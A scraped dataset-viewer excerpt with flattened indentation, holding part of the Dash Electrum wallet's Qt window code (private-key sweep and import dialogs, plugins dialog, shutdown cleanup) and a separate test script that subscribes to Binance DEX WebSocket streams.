export_meta_gui(self, _('requests'), self.wallet.export_requests)
def import_contacts(self):
import_meta_gui(self, _('contacts'), self.contacts.import_file, self.contact_list.update)
def export_contacts(self):
export_meta_gui(self, _('contacts'), self.contacts.export_file)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True, config=self.config)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address_for_corruption(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
privkeys = get_pk()
def on_success(result):
coins, keypairs = result
outputs = [PartialTxOutput.from_address_and_value(addr, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, external_keypairs=keypairs)
def on_failure(exc_info):
self.on_error(exc_info)
msg = _('Preparing sweep transaction...')
task = lambda: self.network.run_from_another_thread(
sweep_preparations(privkeys, self.network))
WaitingDialog(self, msg, task, on_success, on_failure)
def _do_import(self, title, header_layout, func):
text = text_dialog(
parent=self,
title=title,
header_layout=header_layout,
ok_label=_('Import'),
allow_multi=True,
config=self.config,
)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self, go_tab=None):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config, go_tab)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Dash Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
psman = self.wallet.psman
if psman.state in psman.mixing_running_states and not psman.is_waiting:
if not self.question(psman.WAIT_MIXING_STOP_MSG):
event.ignore()
return
if (psman.is_hw_ks
and psman.ps_keystore
and psman.show_warn_ps_ks
and psman.check_funds_on_ps_keystore()):
warn = _('There are funds left on PrivateSend keystore')
q = _('Send all coins to hardware wallet')
msg = f'{warn}\n\n{q}?'
cb = QCheckBox(_("Don't show this again."))
cb.setChecked(psman.show_warn_ps_ks)
def on_cb(x):
psman.show_warn_ps_ks = (x == Qt.Checked)
cb.stateChanged.connect(on_cb)
if self.question(msg, checkbox=cb):
self.send_funds_to_main_ks(mwin=self, parent=self)
event.ignore()
return
# note that closeEvent is NOT called if the user quits with Ctrl-C
self.clean_up()
event.accept()
def stop_get_data_threads(self):
self.history_list.hm.get_data_thread.stop()
self.address_list.am.get_data_thread.stop()
self.utxo_list.cm.get_data_thread.stop()
self.history_list.hm.get_data_thread.wait()
self.address_list.am.get_data_thread.wait()
self.utxo_list.cm.get_data_thread.wait()
def clean_up(self):
if self._cleaned_up:
return
self._cleaned_up = True
self.stop_get_data_threads()
hide_ps_dialog(self)
self.dip3_tab.cleanup()
util.unregister_callback(self.on_ps_callback)
if self.network:
self.wallet.protx_manager.clean_up()
util.unregister_callback(self.on_dash_net)
if self.wallet.thread:
self.wallet.thread.stop()
self.wallet.thread = None
util.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.db.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.db.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
if self._update_check_thread:
self._update_check_thread.exit()
self._update_check_thread.wait()
if self.tray:
self.tray = None
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Dash Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p: Optional['BasePlugin'], name: str, i: int):
widget = settings_widgets.get(name) # type: Optional[QWidget]
if widget and not p:
# plugin got disabled, rm widget
grid.removeWidget(widget)
widget.setParent(None)
settings_widgets.pop(name)
elif widget is None and p and p.requires_settings() and p.is_enabled():
# plugin got enabled, add widget
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
# note: all enabled plugins will receive this hook:
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.is_available() and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def save_transaction_into_wallet(self, tx: Transaction):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.save_db()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
def show_cert_mismatch_error(self):
if self.showing_cert_mismatch_error:
return
self.showing_cert_mismatch_error = True
self.show_critical(title=_("Certificate mismatch"),
msg=_("The SSL certificate provided by the main server did not match the fingerprint passed in with the --serverfingerprint option.") + "\n\n" +
_("Dash Electrum will now exit."))
self.showing_cert_mismatch_error = False
self.close()
|
dev_test_dex_subscribe.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# File: dev_test_dex_subscribe.py
#
# Part of ‘UNICORN Binance WebSocket API’
# Project website: https://www.lucit.tech/unicorn-binance-websocket-api.html
# Github: https://github.com/LUCIT-Systems-and-Development/unicorn-binance-websocket-api
# Documentation: https://unicorn-binance-websocket-api.docs.lucit.tech
# PyPI: https://pypi.org/project/unicorn-binance-websocket-api/
#
# Author: LUCIT Systems and Development
#
# Copyright (c) 2019-2022, LUCIT Systems and Development (https://www.lucit.tech) and Oliver Zehentleitner
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from unicorn_binance_websocket_api.manager import BinanceWebSocketApiManager
import logging
import time
import threading
import os
logging.getLogger("unicorn_binance_websocket_api")
logging.basicConfig(level=logging.DEBUG,
filename=os.path.basename(__file__) + '.log',
format="{asctime} [{levelname:8}] {process} {thread} {module}: {message}",
style="{")
def print_stream_data_from_stream_buffer(binance_websocket_api_manager):
while True:
if binance_websocket_api_manager.is_manager_stopping():
exit(0)
oldest_stream_data_from_stream_buffer = binance_websocket_api_manager.pop_stream_data_from_stream_buffer()
if oldest_stream_data_from_stream_buffer is False:
time.sleep(0.01)
else:
#pass
print(oldest_stream_data_from_stream_buffer)
# create instance of BinanceWebSocketApiManager for Binance Chain DEX
binance_websocket_api_manager = BinanceWebSocketApiManager(exchange="binance.org")
# start a worker process to move the received stream_data from the stream_buffer to a print function
worker_thread = threading.Thread(target=print_stream_data_from_stream_buffer, args=(binance_websocket_api_manager,))
worker_thread.start()
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BNB_USDSB-1AC', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
stream_id = binance_websocket_api_manager.create_stream(["kline_1m"], markets)
markets = ['RAVEN-F66_BNB', 'ANKR-E97_BNB', 'AWC-986_BNB', 'COVA-218_BNB', 'BCPT-95A_BNB', 'WISH-2D5_BNB',
'MITH-C76_BNB', 'BNB_BTCB-1DE', 'BTCB-1DE_USDSB-1AC', 'NEXO-A84_BNB']
channels = ['kline_5m', 'kline_15m']
binance_websocket_api_manager.subscribe_to_stream(stream_id,
channels=['kline_1m', 'kline_5m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'])
binance_websocket_api_manager.unsubscribe_from_stream(stream_id,
channels=['kline_1m', 'marketDepth',
'ticker', 'miniTicker', 'marketDiff'],
markets=markets)
binance_websocket_api_manager.get_stream_subscriptions(stream_id)
while True:
#binance_websocket_api_manager.print_summary()
binance_websocket_api_manager.print_stream_info(stream_id)
time.sleep(1)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.